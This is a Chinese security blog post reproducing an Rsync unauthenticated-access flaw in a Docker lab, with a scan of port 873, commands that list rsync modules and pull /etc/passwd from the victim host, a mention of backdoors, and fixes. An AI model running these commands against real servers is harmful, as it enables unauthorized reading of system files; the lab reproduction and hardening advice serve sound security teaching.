Rsync未授权漏洞复现

admin 2025年6月13日22:14:18评论15 views字数 905阅读3分1秒阅读模式

一.Rsync简介:

  Rsync是一款远程同步功能的软件,同步的同时可以保持源文件的权限、时间、软硬连接等,常被用于文件的同步、分发等。支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或 访问密码,我们将可以读写目标服务器文件。

二.漏洞成因:

 1./etc/rsyncd.conf  未配置账号、密码以及目录权限等

 2./Rsync启动的时候没有指定--address参数,默认内外网都可以连接

 3.没有使用iptable或host  allow等限制可连接rsync服务器的来源ip

三.漏洞复现

在docker下进行漏洞的复现:

存在rsync漏洞的ubuntu服务器:192.168.4.128

攻击机(kali):192.168.4.157

1.开启环境:

#sudo  docker-compose  up -d    //开启该漏洞环境

#sudo  docker  ps     //查看docker运行的进程,查看环境是否运行成功

Rsync未授权漏洞复现

 2 .进行信息收集

使用nmap对此服务器进行端口扫描

#nmap -p 873 192.168.4.128

Rsync未授权漏洞复现

 3.Rsync未授权访问利用

#rsync rsync://{target_ip}/

查看模块名列表:
  rsync rsync://192.168.4.128:873/

Rsync未授权漏洞复现

查看src模块:
  rsync rsync://192.168.4.128:873/src

Rsync未授权漏洞复现

 可以看到受害机器的目录被列举出来了

下载受害机的文件

rsync -av rsync://192.168.4.128/src/etc/passwd     ./

Rsync未授权漏洞复现

 查看下载下来的passwd文件

Rsync未授权漏洞复现

 后续可以进行后渗透,留后门等等操作

四.修复方法

1./etc/rsyncd.conf配置auth  users及secrets  file,为rsync设置复杂的密码;

2.rsync启动的时候用--address参数监听内网ip;

3.使用iptables或配置文件中的hosts allow限制可连接rsync的ip地址

原文始发于微信公众号(红豆芷浠):Rsync未授权漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月13日22:14:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Rsync未授权漏洞复现https://cn-sec.com/archives/947217.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息